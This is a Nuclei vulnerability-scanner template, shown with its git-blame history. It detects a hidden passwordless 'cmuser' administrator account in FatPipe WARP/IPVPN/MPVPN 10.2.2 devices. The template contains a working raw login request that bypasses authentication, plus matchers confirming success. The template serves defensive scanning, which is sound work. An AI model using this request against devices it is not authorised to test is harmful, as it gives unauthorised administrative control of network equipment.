nuclei-templates/vulnerabilities/other/fatpipe-backdoor.yaml

id: fatpipe-backdoor

info:
  name: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account
  author: gy741
  severity: high
  description: FatPipe Networks has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application.
  reference:
    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php
    - https://www.fatpipeinc.com/support/advisories.php
  tags: fatpipe,default-login,backdoor,auth-bypass

requests:
  - raw:
      - |
        POST /fpui/loginServlet HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "application/json"
        part: header

      - type: word
        words:
          - '"loginRes":"success"'
          - '"activeUserName":"cmuser"'
        condition: and
Update and rename fatpipe-networks-warp-backdoor.yaml to fatpipe-backdoor.yaml 2021-09-30 11:48:45 +00:00			`id: fatpipe-backdoor`
Create fatpipe-networks-warp-backdoor.yaml The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-09-30 04:38:01 +00:00
			`info:`
			`name: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 Hidden Backdoor Account`
			`author: gy741`
			`severity: high`
Better description 2021-10-14 13:31:27 +00:00			`description: FatPipe Networks has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application.`
Create fatpipe-networks-warp-backdoor.yaml The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-09-30 04:38:01 +00:00			`reference:`
			`- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5684.php`
Update fatpipe-networks-warp-backdoor.yaml 2021-09-30 10:43:19 +00:00			`- https://www.fatpipeinc.com/support/advisories.php`
			`tags: fatpipe,default-login,backdoor,auth-bypass`
Create fatpipe-networks-warp-backdoor.yaml The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-09-30 04:38:01 +00:00
			`requests:`
			`- raw:`
			`- \|`
			`POST /fpui/loginServlet HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded; charset=UTF-8`

			`loginParams=%7B%22username%22%3A%22cmuser%22%2C%22password%22%3A%22%22%2C%22authType%22%3A0%7D`

			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`words:`
			`- "application/json"`
			`part: header`

			`- type: word`
			`words:`
Update fatpipe-networks-warp-backdoor.yaml 2021-09-30 10:43:19 +00:00			`- '"loginRes":"success"'`
			`- '"activeUserName":"cmuser"'`
Create fatpipe-networks-warp-backdoor.yaml The application has a hidden administrative account cmuser that has no password and has write access permissions to the device. The user cmuser is not visible in Users menu list of the application. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com> 2021-09-30 04:38:01 +00:00			`condition: and`